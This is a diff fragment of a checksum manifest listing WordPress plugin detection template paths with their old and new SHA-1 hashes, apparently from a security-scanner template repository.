-http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c -http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 -http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c -http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 -http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 -http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e -http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a +http/technologies/wordpress/plugins/cmb2.yaml:56d58b98c3fe7753544af6a33ac3b31ae3aa840b +http/technologies/wordpress/plugins/coblocks.yaml:f7c63ccc132f12c2c0e3ae0de8e55989a863cdf4 +http/technologies/wordpress/plugins/code-snippets.yaml:93561cd33bacd1363c88bb59b13f755ef7fda8a2 +http/technologies/wordpress/plugins/coming-soon.yaml:219762004ba773ef7ec9081042f374682f1a4b04 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:2abf82f0a38c6e7facd374a027b65ea4ee0826a0 +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:625975627800cf86177e1874e7580db1fb24e948 +http/technologies/wordpress/plugins/contact-form-7.yaml:e91c65a9faed14796f0a49be4294a2a5d8567c37 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:005a65ac23b9ad192a5ae1f8b424cde911830d80 +http/technologies/wordpress/plugins/cookie-law-info.yaml:132c249d68656b320880fa1187f6e9c49f3324ae +http/technologies/wordpress/plugins/cookie-notice.yaml:b5389deb4ba5f39bcd30bb34eddd49246beb487e +http/technologies/wordpress/plugins/copy-delete-posts.yaml:3a8633b7ab3776572da975475091cfaa2a20b971 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:88737b0fa1f3b36fc803cc6e2e98a4fe7ea90161 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9b190b5561a7f3cffe5c12bf68843ee19ff61bd1 +http/technologies/wordpress/plugins/custom-css-js.yaml:7d2b05c180a3937e83e9e3a49569a67eabeb6af8 +http/technologies/wordpress/plugins/custom-fonts.yaml:d1267254cdaafd391922250d2ee1065d3d033342 +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e0eb3544ea64fe169ddf051418f3680577582422 +http/technologies/wordpress/plugins/disable-comments.yaml:dcb3ddf368211f3bea8b97f2d1e6cc711ad7dfd9 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:d1946f471cf622db86e24e87ff009f61aa09525d +http/technologies/wordpress/plugins/duplicate-page.yaml:b24bb3260543cbaa13ccd9518c78c1610863b609 +http/technologies/wordpress/plugins/duplicate-post.yaml:2a79fec4b12076502b8e7de7ce0504f9c8fb9ee4 +http/technologies/wordpress/plugins/duplicator.yaml:972f69cd6d9e10f3878bc96f80b3f86fa10c457a +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:a6dbb3bebc449f572d3a135fc5d595568808a63a http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 -http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 -http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 -http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d -http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc -http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 -http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 -http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 -http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e -http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 -http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa -http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 -http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 -http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:88bc95a56aaaedbe8f1ba7a827e91ea2aaeac009 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:378d65225affc130cf6838c57d84252eecbff19e +http/technologies/wordpress/plugins/elementor.yaml:dbc00c3b79733ae31cc8891e670c5c4326ca11a4 +http/technologies/wordpress/plugins/elementskit-lite.yaml:d145fac60e8417f0eb98b16a96ebecfaa57b0774 +http/technologies/wordpress/plugins/enable-media-replace.yaml:45dbdc7e8d165732abcd0cee10e207535820796f +http/technologies/wordpress/plugins/envato-elements.yaml:82495933d246cf14f003d78cc83c6fc56f79b40e +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:aa8d12ab140f54418742e1578d5b1a268291ae20 +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:beaa3cf80dd1e33545be8a3f3cf0917ce9d21106 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:e0ae6bb7fe963da55d421bf5ab56a1f605486886 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:122c138fb18849e95ac6a3d71d31405ec53b3b75 +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:6fa9e6c05cde8d3e5e88afac6da676f741d2f079 +http/technologies/wordpress/plugins/flamingo.yaml:8c7b2c1d7e91b0bb4e9d74547bed04230a6b163c +http/technologies/wordpress/plugins/fluentform.yaml:24f0293b05de2f0528921eb895f5d8a37cb1775f +http/technologies/wordpress/plugins/font-awesome.yaml:a2e28d211f784f141e3a73317a18fa993f62b277 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:9819f5eae200f396e290810f83ded543754bb7dc +http/technologies/wordpress/plugins/formidable.yaml:5b593621f59c0eed5b7fbf9bb9795c644d0bdfb6 +http/technologies/wordpress/plugins/forminator.yaml:e9241918fdfc9e9a66f24f3a3ed48e17f424f020 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:ef22367a263c05ebc06e7ede1c27e5a641de9891 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:ec85802104e65ebc4363ebe105658c5930bb0122 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:f9bfc7eb3700d158c70236878f3f2ec592c14a5a +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:c33d421bb8c810833a8efcacc5b3149c0fe81722 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:7c0194fea74d3313b5766c6a78e9cb4f12991db0 +http/technologies/wordpress/plugins/google-site-kit.yaml:ee56e3f9267691f664cfb1d79b2069dd3d43884a +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f8f40b43ba066c021d9469081d0f4fc648fd2427 +http/technologies/wordpress/plugins/gtranslate.yaml:e093d916ff643bc71472b7ce0184a0d1fb74a237 +http/technologies/wordpress/plugins/gutenberg.yaml:18e1f4863c283cf9dc2fd2cd6f135d41dba0dff1 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:9b568be2e06bd21b557990624ab48bf993b10148 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d -http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf -http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 -http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 -http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 -http/technologies/wordpress/plugins/image-optimization.yaml:12b0b8d10e65946e41142eb6a461eb801e925582 -http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff -http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 -http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:962d2727dfa399c1558f33d3b35062e7a8dd6ef2 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:e4f72dd5ae171713751f7be33130a03e5f36f966 +http/technologies/wordpress/plugins/header-footer.yaml:e0c9639c3a960871260bccf3e06d250b9f10a1c5 +http/technologies/wordpress/plugins/health-check.yaml:44da5a76b6e9bcee78f245f6f8317917cd7df1da +http/technologies/wordpress/plugins/hello-dolly.yaml:bb9c2310e49c513c9d0273d4507c9bac10207c0e +http/technologies/wordpress/plugins/host-webfonts-local.yaml:8bff3512c1b069179f0d8d2799f66ebfa23b47a2 +http/technologies/wordpress/plugins/hostinger.yaml:fcd5fc6fa4ba0a5e3caa6be12c80bab1194ef6e0 +http/technologies/wordpress/plugins/image-optimization.yaml:87f1fa2c2441d0b349cad2c83e17e7a02d69c66d +http/technologies/wordpress/plugins/imagify.yaml:d81f7016ff017883205f389ce36c8b2eae22cae5 +http/technologies/wordpress/plugins/imsanity.yaml:10a1a8dbde98dd46ca668c1ad02810a569e474f1 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:7df8b4fdd7f2c910c8893077b39e4301c5158b59 +http/technologies/wordpress/plugins/instagram-feed.yaml:37c3a1b025eebe25cf9fd0054a47bf604936cba3 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:f7bf25dc050e1b8fe2543c0291b499949e27b67e http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f -http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 -http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a -http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc -http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c -http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 -http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 -http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab +http/technologies/wordpress/plugins/jetpack-boost.yaml:79a449e90256aedd5e93bef3d3f5a3e221cdd630 +http/technologies/wordpress/plugins/jetpack.yaml:3f0155e37abb46543acc9335f5fb6690e9aed7e5 +http/technologies/wordpress/plugins/kadence-blocks.yaml:a916400055ade33076cba026249b44731db5c117 +http/technologies/wordpress/plugins/kirki.yaml:f8f4189d5c9d235a505da5a77b55369c5399bf7a +http/technologies/wordpress/plugins/leadin.yaml:729b718818d4ef66745b71e2864daa03b4b7b427 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:58de4d30dab0f1642fa00da78fc4473f9c941556 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:58f8d5d41c3160653210ff6c9face085c6e0c3ee +http/technologies/wordpress/plugins/litespeed-cache.yaml:5b311ec0deb23b9923edcfd4d87da2b264fc465c +http/technologies/wordpress/plugins/loco-translate.yaml:3f20e9face7c8e5b484e59afa1d0fbf673524144 +http/technologies/wordpress/plugins/loginizer.yaml:db2ba6f661f90d62c41abaaabd3b576260e148d7 http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec -http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 -http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 -http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 -http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 -http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 -http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 -http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 -http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e -http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 -http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d -http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 -http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 -http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 -http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 -http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 -http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 -http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:15ed65f147dc4078f91aea3ed5774d7a7bfad706 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:033222df0541159049c3c11ae9300732b8201243 +http/technologies/wordpress/plugins/mailpoet.yaml:479beb07ff02193816a10a1a91992d0395090295 +http/technologies/wordpress/plugins/maintenance.yaml:570043796c51cd0a308901885b7b48e52769b980 +http/technologies/wordpress/plugins/mainwp-child.yaml:7b6abbbc15047dc952985c30399ca942381557bc +http/technologies/wordpress/plugins/malcare-security.yaml:8eb9f5fad314a36f22f3eb4abf03aaacafb80dc6 +http/technologies/wordpress/plugins/megamenu.yaml:98cf903793c60160753fcb6139c0d5b33080a643 +http/technologies/wordpress/plugins/members.yaml:c4667b0ed20dd32b3b436e96b8f14f53ab21a66c +http/technologies/wordpress/plugins/meta-box.yaml:03a391a62de5897c54e91ab7c2605d95bfb37e7e +http/technologies/wordpress/plugins/metform.yaml:6faca0988d6a97ccadfba72b45342dd2e2d052be +http/technologies/wordpress/plugins/ml-slider.yaml:986f9bc6f31968e5983bf58ef808beea2287f254 +http/technologies/wordpress/plugins/newsletter.yaml:0d317cde0bcbd92143e78c545d8cb9e6de25e8d7 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:1e8a66f9219be05411aa7f8ad0deebafe0b0ced0 +http/technologies/wordpress/plugins/nextgen-gallery.yaml:1cfbf41558073abfefcc7cbfefb11bd4f0d255e8 +http/technologies/wordpress/plugins/ninja-forms.yaml:a1cb2b389bd724020735c9e7f9e3b2fa5890245d +http/technologies/wordpress/plugins/ocean-extra.yaml:340a3734ca9bf192ad82362355e437efeff71950 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:cae0e9d69dedc7a0a0819b3a387c35d01f70d423 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:d03fb41ddff348673ad9a15373d7f3a9f03716c1 +http/technologies/wordpress/plugins/optinmonster.yaml:0bbb43608df51dc6b6d511ff5da8f4df77cc8b05 +http/technologies/wordpress/plugins/otter-blocks.yaml:105bebb6c141665de82d3d6f535895049117414c +http/technologies/wordpress/plugins/password-protected.yaml:76bc9c579da3994b8b4ddfaa57c8e620b7f5d631 +http/technologies/wordpress/plugins/pdf-embedder.yaml:195a8aa42208810c40af48ee93bcb5f1bb0b7d3f http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb -http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 -http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:546d9d498a2b61300f1c6a9b27780f906e4b494c +http/technologies/wordpress/plugins/pixelyoursite.yaml:d3f65feb4e5ce979f07c71c25ce849aa56426378 +http/technologies/wordpress/plugins/polylang.yaml:f847bf4d6c830ad0424060587d00bdcfc1a3f689 http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 -http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 -http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c -http/technologies/wordpress/plugins/pretty-link.yaml:9babdd01d2c338a5f22e1e684a3d2a6b82424668 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc -http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 -http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 -http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d -http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 -http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad -http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 +http/technologies/wordpress/plugins/popup-maker.yaml:49579975d5f7dade45c84f460d6484d71e9806d7 +http/technologies/wordpress/plugins/post-smtp.yaml:03493882dcd57e25abb2d6560496e245a474d0f6 +http/technologies/wordpress/plugins/post-types-order.yaml:9f9ac441d2ca6671e98971960bf31e7f668072d6 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ff6a8c2ed6fe0fa3cb70eb8465a024be3be84916 +http/technologies/wordpress/plugins/pretty-link.yaml:03d1a4a60ba4bc21b09bfed52f8e516542707d3b +http/technologies/wordpress/plugins/really-simple-captcha.yaml:6f82ca7b4e1a5fc6d584249e048e9333ea0c7547 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:0d8f6f8df59e645ffd624de7a7c40662afe5f294 +http/technologies/wordpress/plugins/redirection.yaml:9cf9496bf604610516a57b1ab0153281fc8f868c +http/technologies/wordpress/plugins/redux-framework.yaml:b3ce06c9301cda73be9373d11ac5976c59274aec +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:1675ff4488b59edffd291aeeec5cc77c03b99443 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:eda1be4651f6e5473888cb91b7fa096723ca3536 +http/technologies/wordpress/plugins/safe-svg.yaml:c4e9f8a5d7ae80bc58038171e221df9043c7276f +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:8c5785ca835e5d7407258ed99c3a1acf7728d9c1 +http/technologies/wordpress/plugins/sg-cachepress.yaml:e4cf8b3ebc5094f167bbb77d59c091c0e2ee8f11 +http/technologies/wordpress/plugins/sg-security.yaml:8f60b4eb3acbca0583f5a1e4413e68e2b0fe7c1a +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:5cd34fd919ce1b47431e7fb3dfbc11121378bb07 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:4cd69acaf847e8d8a649a732dfaf28e856f9742d +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:387412824c075250c22fbc6566c36d41e06ad22a +http/technologies/wordpress/plugins/simple-history.yaml:2dcfa1ab535d544231d2d1f097be79c15b23fd0b http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead -http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f +http/technologies/wordpress/plugins/siteguard.yaml:46fad30eea13bc5f1e337ca93138ccbf156f49e4 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:63bd2bbcee9fb09224793f4ccaa68a706ba9202e +http/technologies/wordpress/plugins/smart-slider-3.yaml:4da9062e6eef34e011e9b5819660931c92ca4173 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:92d6f732fd7dfee977b2078cf0b83eeb4b1b68e1 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e -http/technologies/wordpress/plugins/svg-support.yaml:9e209af3c91abf6ba27d6d2b49ddf7196dc91450 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 -http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 -http/technologies/wordpress/plugins/templately.yaml:2b4d2d3c2706a8736bd848f882e18bb587689859 -http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:bd247c94885b1da97dc51c13a56e7c84d894c761 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:5908cb3246dcdf46dc98b763184b8f01737a50a4 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:26afcb953d094462be68cd6dbba3c453c9e8862f +http/technologies/wordpress/plugins/svg-support.yaml:228cb4685e47ad452248f71f8df21e6ed4b85c60 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:4c155b7e950a03f7c47a0fb63e935f3d9507ccf1 +http/technologies/wordpress/plugins/tablepress.yaml:2b23c3886fc862c2ef12ccab4070237696bbfb63 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:c3a8b84fa14185e7e50827cc9805e6fb58622a36 +http/technologies/wordpress/plugins/templately.yaml:5ded2e937e4ea62a2623d98a5adabd8417e0827a +http/technologies/wordpress/plugins/the-events-calendar.yaml:53aba5273d5234c613787d2578052deb1c522185 http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 -http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:f7d9f8a3a14f7941e59ee2bd2b558ff04b319c84 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:102c37741c414c602dd78cdd634ec09d95e51f88 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:449866009f906df79fe07404ac1a254ac5fc22e0 +http/technologies/wordpress/plugins/under-construction-page.yaml:6c4df85ae871efa68ea2257df37f10bde8484bfa http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:ca4d717fe515b7eb6536411561bb5541b05681fa +http/technologies/wordpress/plugins/updraftplus.yaml:f06e5cd807949214a2e1bbbc1977838ea35c842b http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 +http/technologies/wordpress/plugins/user-role-editor.yaml:cbce60e9328bf030c21ac8c8d0ea41159642974b http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef 